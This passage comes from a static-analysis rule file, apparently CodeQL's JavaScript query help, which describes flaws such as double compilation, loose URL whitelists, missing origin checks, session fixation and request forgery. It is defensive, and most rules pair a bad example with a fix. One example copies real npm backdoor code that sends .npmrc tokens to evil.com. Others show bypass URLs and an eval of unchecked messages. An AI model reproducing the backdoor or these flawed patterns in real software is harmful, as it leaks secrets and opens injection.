Each DOM element should only be compiled once, otherwise unexpected behavior may result.\n\n\n## Recommendation\nOnly compile new DOM elements.\n\n\n## Example\nThe following example (adapted from the AngularJS developer guide) shows a directive that adds a tooltip to a DOM element, and then compiles the entire element to apply nested directives.\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(element)(scope); // NOT OK\n }\n };\n});\n\n```\nThis is problematic, since it will recompile all of `element`, including parts that have already been compiled.\n\nInstead, only the new element should be compiled:\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(tooltip)(scope); // OK\n }\n };\n});\n\n```\n\n## References\n* AngularJS Developer Guide: [Double Compilation, and how to avoid it](https://docs.angularjs.org/guide/compiler#double-compilation-and-how-to-avoid-it).\n* Common Weakness Enumeration: [CWE-1176](https://cwe.mitre.org/data/definitions/1176.html).\n", + "markdown" : "# Double compilation\nThe AngularJS compiler processes (parts of) the DOM, determining which directives match which DOM elements, and then applies the directives to the elements. 
Each DOM element should only be compiled once, otherwise unexpected behavior may result.\n\n\n## Recommendation\nOnly compile new DOM elements.\n\n\n## Example\nThe following example (adapted from the AngularJS developer guide) shows a directive that adds a tooltip to a DOM element, and then compiles the entire element to apply nested directives.\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(element)(scope); // NOT OK\n }\n };\n});\n\n```\nThis is problematic, since it will recompile all of `element`, including parts that have already been compiled.\n\nInstead, only the new element should be compiled:\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(tooltip)(scope); // OK\n }\n };\n});\n\n```\n\n## References\n* AngularJS Developer Guide: [Double Compilation, and how to avoid it](https://docs.angularjs.org/guide/compiler#double-compilation-and-how-to-avoid-it).\n* Common Weakness Enumeration: [CWE-1176](https://cwe.mitre.org/data/definitions/1176.html).\n" + }, + "properties" : { + "tags" : [ "reliability", "frameworks/angularjs", "security", "external/cwe/cwe-1176" ], + "description" : "Recompiling an already compiled part of the DOM can lead to\n unexpected behavior of directives, performance problems, and memory leaks.", + "id" : "js/angular/double-compilation", + "kind" : "problem", + "name" : "Double compilation", + "precision" : "very-high", + "problem.severity" : "warning", + "security-severity" : 
"8.8" + } + }, { + "id" : "js/angular/insecure-url-whitelist", + "name" : "js/angular/insecure-url-whitelist", + "shortDescription" : { + "text" : "Insecure URL whitelist" + }, + "fullDescription" : { + "text" : "URL whitelists that are too permissive can cause security vulnerabilities." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Insecure URL whitelist\nAngularJS uses filters to ensure that the URLs used for sourcing AngularJS templates and other script-running URLs are safe. One such filter is a whitelist of URL patterns to allow.\n\nA URL pattern that is too permissive can cause security vulnerabilities.\n\n\n## Recommendation\nMake the whitelist URL patterns as restrictive as possible.\n\n\n## Example\nThe following example shows an AngularJS application with whitelist URL patterns that all are too permissive.\n\n\n```javascript\nangular.module('myApp', [])\n .config(function($sceDelegateProvider) {\n $sceDelegateProvider.resourceUrlWhitelist([\n \"*://example.org/*\", // BAD\n \"https://**.example.com/*\", // BAD\n \"https://example.**\", // BAD\n \"https://example.*\" // BAD\n ]);\n });\n\n```\nThis is problematic, since the four patterns match the following malicious URLs, respectively:\n\n* `javascript://example.org/a%0A%0Dalert(1)` (`%0A%0D` is a linebreak)\n* `https://evil.com/?ignore=://example.com/a`\n* `https://example.evil.com`\n* `https://example.evilTld`\n\n## References\n* OWASP/Google presentation: [Securing AngularJS Applications](https://www.owasp.org/images/6/6e/Benelus_day_20161125_S_Lekies_Securing_AngularJS_Applications.pdf)\n* AngularJS Developer Guide: [Format of items in resourceUrlWhitelist/Blacklist](https://docs.angularjs.org/api/ng/service/$sce#resourceUrlPatternItem).\n* Common Weakness Enumeration: [CWE-183](https://cwe.mitre.org/data/definitions/183.html).\n* Common Weakness Enumeration: [CWE-625](https://cwe.mitre.org/data/definitions/625.html).\n", + "markdown" : "# 
Insecure URL whitelist\nAngularJS uses filters to ensure that the URLs used for sourcing AngularJS templates and other script-running URLs are safe. One such filter is a whitelist of URL patterns to allow.\n\nA URL pattern that is too permissive can cause security vulnerabilities.\n\n\n## Recommendation\nMake the whitelist URL patterns as restrictive as possible.\n\n\n## Example\nThe following example shows an AngularJS application with whitelist URL patterns that all are too permissive.\n\n\n```javascript\nangular.module('myApp', [])\n .config(function($sceDelegateProvider) {\n $sceDelegateProvider.resourceUrlWhitelist([\n \"*://example.org/*\", // BAD\n \"https://**.example.com/*\", // BAD\n \"https://example.**\", // BAD\n \"https://example.*\" // BAD\n ]);\n });\n\n```\nThis is problematic, since the four patterns match the following malicious URLs, respectively:\n\n* `javascript://example.org/a%0A%0Dalert(1)` (`%0A%0D` is a linebreak)\n* `https://evil.com/?ignore=://example.com/a`\n* `https://example.evil.com`\n* `https://example.evilTld`\n\n## References\n* OWASP/Google presentation: [Securing AngularJS Applications](https://www.owasp.org/images/6/6e/Benelus_day_20161125_S_Lekies_Securing_AngularJS_Applications.pdf)\n* AngularJS Developer Guide: [Format of items in resourceUrlWhitelist/Blacklist](https://docs.angularjs.org/api/ng/service/$sce#resourceUrlPatternItem).\n* Common Weakness Enumeration: [CWE-183](https://cwe.mitre.org/data/definitions/183.html).\n* Common Weakness Enumeration: [CWE-625](https://cwe.mitre.org/data/definitions/625.html).\n" + }, + "properties" : { + "tags" : [ "security", "frameworks/angularjs", "external/cwe/cwe-183", "external/cwe/cwe-625" ], + "description" : "URL whitelists that are too permissive can cause security vulnerabilities.", + "id" : "js/angular/insecure-url-whitelist", + "kind" : "problem", + "name" : "Insecure URL whitelist", + "precision" : "very-high", + "problem.severity" : "warning", + "security-severity" : "7.5" 
+ } + }, { + "id" : "js/identity-replacement", + "name" : "js/identity-replacement", + "shortDescription" : { + "text" : "Replacement of a substring with itself" + }, + "fullDescription" : { + "text" : "Replacing a substring with itself has no effect and may indicate a mistake." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Replacement of a substring with itself\nReplacing a substring with itself has no effect and usually indicates a mistake, such as misspelling a backslash escape.\n\n\n## Recommendation\nExamine the string replacement to find and correct any typos.\n\n\n## Example\nThe following code snippet attempts to backslash-escape all double quotes in `raw` by replacing all instances of `\"` with `\\\"`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\"');\n\n```\nHowever, the replacement string `'\\\"'` is actually the same as `'\"'`, with `\\\"` interpreted as an identity escape, so the replacement does nothing. 
Instead, the replacement string should be `'\\\\\"'`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\\\"');\n\n```\n\n## References\n* Mozilla Developer Network: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Replacement of a substring with itself\nReplacing a substring with itself has no effect and usually indicates a mistake, such as misspelling a backslash escape.\n\n\n## Recommendation\nExamine the string replacement to find and correct any typos.\n\n\n## Example\nThe following code snippet attempts to backslash-escape all double quotes in `raw` by replacing all instances of `\"` with `\\\"`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\"');\n\n```\nHowever, the replacement string `'\\\"'` is actually the same as `'\"'`, with `\\\"` interpreted as an identity escape, so the replacement does nothing. 
Instead, the replacement string should be `'\\\\\"'`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\\\"');\n\n```\n\n## References\n* Mozilla Developer Network: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-116" ], + "description" : "Replacing a substring with itself has no effect and may indicate a mistake.", + "id" : "js/identity-replacement", + "kind" : "problem", + "name" : "Replacement of a substring with itself", + "precision" : "very-high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/unsafe-external-link", + "name" : "js/unsafe-external-link", + "shortDescription" : { + "text" : "Potentially unsafe external link" + }, + "fullDescription" : { + "text" : "External links that open in a new tab or window but do not specify link type 'noopener' or 'noreferrer' are a potential security risk." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Potentially unsafe external link\nHTML links that open in a new tab or window allow the target page to access the DOM of the origin page using `window.opener` unless link type `noopener` or `noreferrer` is specified. This is a potential security risk.\n\n\n## Recommendation\nSpecify the link type by adding an attribute `rel=\"noopener noreferrer\"`.\n\n\n## Example\nIn the following example, a JSX element is created that corresponds to an HTML link opening the URL `http://example.com` in a new tab. 
Since it does not specify a link type, that page will be able to access the DOM of the origin page.\n\n\n```javascript\nvar link = Example;\n\n```\nTo fix this vulnerability, add a `rel` attribute:\n\n\n```javascript\nvar link = Example;\n\n```\n\n## References\n* Mathias Bynens: [About rel=noopener](https://mathiasbynens.github.io/rel-noopener/).\n* Mozilla Developer Network: [HTML Anchor Element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/a).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-1022](https://cwe.mitre.org/data/definitions/1022.html).\n", + "markdown" : "# Potentially unsafe external link\nHTML links that open in a new tab or window allow the target page to access the DOM of the origin page using `window.opener` unless link type `noopener` or `noreferrer` is specified. This is a potential security risk.\n\n\n## Recommendation\nSpecify the link type by adding an attribute `rel=\"noopener noreferrer\"`.\n\n\n## Example\nIn the following example, a JSX element is created that corresponds to an HTML link opening the URL `http://example.com` in a new tab. 
Since it does not specify a link type, that page will be able to access the DOM of the origin page.\n\n\n```javascript\nvar link = Example;\n\n```\nTo fix this vulnerability, add a `rel` attribute:\n\n\n```javascript\nvar link = Example;\n\n```\n\n## References\n* Mathias Bynens: [About rel=noopener](https://mathiasbynens.github.io/rel-noopener/).\n* Mozilla Developer Network: [HTML Anchor Element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/a).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-1022](https://cwe.mitre.org/data/definitions/1022.html).\n" + }, + "properties" : { + "tags" : [ "maintainability", "security", "external/cwe/cwe-200", "external/cwe/cwe-1022" ], + "description" : "External links that open in a new tab or window but do not specify\n link type 'noopener' or 'noreferrer' are a potential security risk.", + "id" : "js/unsafe-external-link", + "kind" : "problem", + "name" : "Potentially unsafe external link", + "precision" : "very-high", + "problem.severity" : "warning", + "security-severity" : "6.5" + } + }, { + "id" : "js/regex/missing-regexp-anchor", + "name" : "js/regex/missing-regexp-anchor", + "shortDescription" : { + "text" : "Missing regular expression anchor" + }, + "fullDescription" : { + "text" : "Regular expressions without anchors can be vulnerable to bypassing." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Missing regular expression anchor\nSanitizing untrusted input with regular expressions is a common technique. However, it is error-prone to match untrusted input against regular expressions without anchors such as `^` or `$`. 
Malicious input can bypass such security checks by embedding one of the allowed patterns in an unexpected location.\n\nEven if the matching is not done in a security-critical context, it may still cause undesirable behavior when the regular expression accidentally matches.\n\n\n## Recommendation\nUse anchors to ensure that regular expressions match at the expected locations.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.match(/https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nThe check with the regular expression match is, however, easy to bypass. For example by embedding `http://example.com/` in the query string component: `http://evil-example.net/?x=http://example.com/`. Address these shortcomings by using anchors in the regular expression instead:\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // GOOD: the host of `url` can not be controlled by an attacker\n if (url.match(/^https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nA related mistake is to write a regular expression with multiple alternatives, but to only include an anchor for one of the alternatives. 
As an example, the regular expression `/^www\\.example\\.com|beta\\.example\\.com/` will match the host `evil.beta.example.com` because the regular expression is parsed as `/(^www\\.example\\.com)|(beta\\.example\\.com)/`\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Missing regular expression anchor\nSanitizing untrusted input with regular expressions is a common technique. However, it is error-prone to match untrusted input against regular expressions without anchors such as `^` or `$`. Malicious input can bypass such security checks by embedding one of the allowed patterns in an unexpected location.\n\nEven if the matching is not done in a security-critical context, it may still cause undesirable behavior when the regular expression accidentally matches.\n\n\n## Recommendation\nUse anchors to ensure that regular expressions match at the expected locations.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.match(/https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nThe check with the regular expression match is, however, easy to bypass. For example by embedding `http://example.com/` in the query string component: `http://evil-example.net/?x=http://example.com/`. 
Address these shortcomings by using anchors in the regular expression instead:\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // GOOD: the host of `url` can not be controlled by an attacker\n if (url.match(/^https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nA related mistake is to write a regular expression with multiple alternatives, but to only include an anchor for one of the alternatives. As an example, the regular expression `/^www\\.example\\.com|beta\\.example\\.com/` will match the host `evil.beta.example.com` because the regular expression is parsed as `/(^www\\.example\\.com)|(beta\\.example\\.com)/`\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], + "description" : "Regular expressions without anchors can be vulnerable to bypassing.", + "id" : "js/regex/missing-regexp-anchor", + "kind" : "problem", + "name" : "Missing regular expression anchor", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/missing-origin-check", + "name" : "js/missing-origin-check", + "shortDescription" : { + "text" : "Missing origin verification in `postMessage` handler" + }, + "fullDescription" : { + "text" : "Missing origin verification in a `postMessage` handler allows any windows to send arbitrary data to the handler." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Missing origin verification in `postMessage` handler\nThe `\"message\"` event is used to send messages between windows. An untrusted window can send a message to a trusted window, and it is up to the receiver to verify the legitimacy of the message. One way of performing that verification is to check the `origin` of the message ensure that it originates from a trusted window.\n\n\n## Recommendation\nAlways verify the origin of incoming messages.\n\n\n## Example\nThe example below uses a received message to execute some code. However, the origin of the message is not checked, so it might be possible for an attacker to execute arbitrary code.\n\n\n```javascript\nfunction postMessageHandler(event) {\n let origin = event.origin.toLowerCase();\n\n console.log(origin)\n // BAD: the origin property is not checked\n eval(event.data);\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n\n```\nThe example is fixed below, where the origin is checked to be trusted. 
It is therefore not possible for a malicious user to perform an attack using an untrusted origin.\n\n\n```javascript\nfunction postMessageHandler(event) {\n console.log(event.origin)\n // GOOD: the origin property is checked\n if (event.origin === 'https://www.example.com') {\n // do something\n }\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n```\n\n## References\n* [Window.postMessage()](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* [Web message manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation).\n* [The pitfalls of postMessage](https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-940](https://cwe.mitre.org/data/definitions/940.html).\n", + "markdown" : "# Missing origin verification in `postMessage` handler\nThe `\"message\"` event is used to send messages between windows. An untrusted window can send a message to a trusted window, and it is up to the receiver to verify the legitimacy of the message. One way of performing that verification is to check the `origin` of the message ensure that it originates from a trusted window.\n\n\n## Recommendation\nAlways verify the origin of incoming messages.\n\n\n## Example\nThe example below uses a received message to execute some code. However, the origin of the message is not checked, so it might be possible for an attacker to execute arbitrary code.\n\n\n```javascript\nfunction postMessageHandler(event) {\n let origin = event.origin.toLowerCase();\n\n console.log(origin)\n // BAD: the origin property is not checked\n eval(event.data);\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n\n```\nThe example is fixed below, where the origin is checked to be trusted. 
It is therefore not possible for a malicious user to perform an attack using an untrusted origin.\n\n\n```javascript\nfunction postMessageHandler(event) {\n console.log(event.origin)\n // GOOD: the origin property is checked\n if (event.origin === 'https://www.example.com') {\n // do something\n }\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n```\n\n## References\n* [Window.postMessage()](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* [Web message manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation).\n* [The pitfalls of postMessage](https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-940](https://cwe.mitre.org/data/definitions/940.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020", "external/cwe/cwe-940" ], + "description" : "Missing origin verification in a `postMessage` handler allows any windows to send arbitrary data to the handler.", + "id" : "js/missing-origin-check", + "kind" : "problem", + "name" : "Missing origin verification in `postMessage` handler", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "5" + } + }, { + "id" : "js/file-access-to-http", + "name" : "js/file-access-to-http", + "shortDescription" : { + "text" : "File data in outbound network request" + }, + "fullDescription" : { + "text" : "Directly sending file data in an outbound network request can indicate unauthorized information disclosure." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# File data in outbound network request\nSending local file system data to a remote URL without further validation risks uncontrolled information exposure, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example is adapted from backdoor code that was identified in two popular npm packages. It reads the contents of the `.npmrc` file (which may contain secret npm tokens) and sends it to a remote server by embedding it into an HTTP request header.\n\n\n```javascript\nvar fs = require(\"fs\"),\n https = require(\"https\");\n\nvar content = fs.readFileSync(\".npmrc\", \"utf8\");\nhttps.get({\n hostname: \"evil.com\",\n path: \"/upload\",\n method: \"GET\",\n headers: { Referer: content }\n}, () => { });\n\n```\n\n## References\n* ESLint Blog: [Postmortem for Malicious Packages Published on July 12th, 2018](https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes).\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n", + "markdown" : "# File data in outbound network request\nSending local file system data to a remote URL without further validation risks uncontrolled information exposure, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example is adapted from backdoor code that was identified in two popular npm packages. 
It reads the contents of the `.npmrc` file (which may contain secret npm tokens) and sends it to a remote server by embedding it into an HTTP request header.\n\n\n```javascript\nvar fs = require(\"fs\"),\n https = require(\"https\");\n\nvar content = fs.readFileSync(\".npmrc\", \"utf8\");\nhttps.get({\n hostname: \"evil.com\",\n path: \"/upload\",\n method: \"GET\",\n headers: { Referer: content }\n}, () => { });\n\n```\n\n## References\n* ESLint Blog: [Postmortem for Malicious Packages Published on July 12th, 2018](https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes).\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-200" ], + "description" : "Directly sending file data in an outbound network request can indicate unauthorized information disclosure.", + "id" : "js/file-access-to-http", + "kind" : "path-problem", + "name" : "File data in outbound network request", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "6.5" + } + }, { + "id" : "js/session-fixation", + "name" : "js/session-fixation", + "shortDescription" : { + "text" : "Failure to abandon session" + }, + "fullDescription" : { + "text" : "Reusing an existing session as a different user could allow an attacker to access someone else's account by using their session." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Failure to abandon session\nReusing a session could allow an attacker to gain unauthorized access to another account. 
Always ensure that, when a user logs in or out, the current session is abandoned so that a new session may be started.\n\n\n## Recommendation\nAlways use `req.session.regenerate(...);` to start a new session when a user logs in or out.\n\n\n## Example\nThe following example shows the previous session being used after authentication. This would allow a previous user to use the new user's account.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' && req.body.password === 'admin') {\n req.session.authenticated = true;\n res.redirect('/');\n } else {\n res.redirect('/login');\n }\n});\n```\nThis code example solves the problem by not reusing the session, and instead calling `req.session.regenerate()` to ensure that the session is not reused.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' && req.body.password === 'admin') {\n req.session.regenerate(function (err) {\n if (err) {\n res.send('Error');\n } else {\n req.session.authenticated = true;\n res.redirect('/');\n }\n });\n } else {\n res.redirect('/login');\n }\n});\n```\n\n## References\n* OWASP: [Session fixation](https://www.owasp.org/index.php/Session_fixation)\n* Stack Overflow: [Creating a new session after authentication with 
Passport](https://stackoverflow.com/questions/22209354/creating-a-new-session-after-authentication-with-passport/30468384#30468384)\n* jscrambler.com: [Best practices for secure session management in Node](https://blog.jscrambler.com/best-practices-for-secure-session-management-in-node)\n* Common Weakness Enumeration: [CWE-384](https://cwe.mitre.org/data/definitions/384.html).\n", + "markdown" : "# Failure to abandon session\nReusing a session could allow an attacker to gain unauthorized access to another account. Always ensure that, when a user logs in or out, the current session is abandoned so that a new session may be started.\n\n\n## Recommendation\nAlways use `req.session.regenerate(...);` to start a new session when a user logs in or out.\n\n\n## Example\nThe following example shows the previous session being used after authentication. This would allow a previous user to use the new user's account.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' && req.body.password === 'admin') {\n req.session.authenticated = true;\n res.redirect('/');\n } else {\n res.redirect('/login');\n }\n});\n```\nThis code example solves the problem by not reusing the session, and instead calling `req.session.regenerate()` to ensure that the session is not reused.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' 
&& req.body.password === 'admin') {\n req.session.regenerate(function (err) {\n if (err) {\n res.send('Error');\n } else {\n req.session.authenticated = true;\n res.redirect('/');\n }\n });\n } else {\n res.redirect('/login');\n }\n});\n```\n\n## References\n* OWASP: [Session fixation](https://www.owasp.org/index.php/Session_fixation)\n* Stack Overflow: [Creating a new session after authentication with Passport](https://stackoverflow.com/questions/22209354/creating-a-new-session-after-authentication-with-passport/30468384#30468384)\n* jscrambler.com: [Best practices for secure session management in Node](https://blog.jscrambler.com/best-practices-for-secure-session-management-in-node)\n* Common Weakness Enumeration: [CWE-384](https://cwe.mitre.org/data/definitions/384.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-384" ], + "description" : "Reusing an existing session as a different user could allow\n an attacker to access someone else's account by using\n their session.", + "id" : "js/session-fixation", + "kind" : "problem", + "name" : "Failure to abandon session", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "5" + } + }, { + "id" : "js/client-side-request-forgery", + "name" : "js/client-side-request-forgery", + "shortDescription" : { + "text" : "Client-side request forgery" + }, + "fullDescription" : { + "text" : "Making a client-to-server request with user-controlled data in the URL allows a request forgery attack against the client." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Client-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. 
A client-side forged request may perform an unwanted action affecting the victim's account, or may lead to cross-site scripting if the request response is handled in an unsafe way. This is different from CSRF (cross-site request forgery), and will usually bypass CSRF protections. This is usually less severe than SSRF (server-side request forgery), as it does not expose internal services.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request used to fetch the pre-rendered HTML body of a message. It is using the endpoint `/api/messages/ID`, which is believed to respond with a safe HTML string, to be embedded in the page:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + query.get('message_id');\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\nHowever, the format of the message ID is not checked, and an attacker can abuse this to alter the endpoint targeted by the request. If they can redirect it to an endpoint that returns an untrusted value, this leads to cross-site scripting.\n\nFor example, given the query string `message_id=../pastebin/123`, the request will end up targeting the `/api/pastebin` endpoint. 
Or if there is an open redirect on the login page, a query string like `message_id=../../login?redirect_url=https://evil.com` could give the attacker full control over the response as well.\n\nIn example below, the input has been restricted to a number so that the endpoint cannot be altered:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + Number(query.get('message_id'));\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\n\n## References\n* OWASP: [Server-side request forgery](https://cwe.mitre.org/data/definitions/918.html)\n* OWASP: [Cross-site request forgery](https://cwe.mitre.org/data/definitions/352.html)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n", + "markdown" : "# Client-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. A client-side forged request may perform an unwanted action affecting the victim's account, or may lead to cross-site scripting if the request response is handled in an unsafe way. This is different from CSRF (cross-site request forgery), and will usually bypass CSRF protections. This is usually less severe than SSRF (server-side request forgery), as it does not expose internal services.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. 
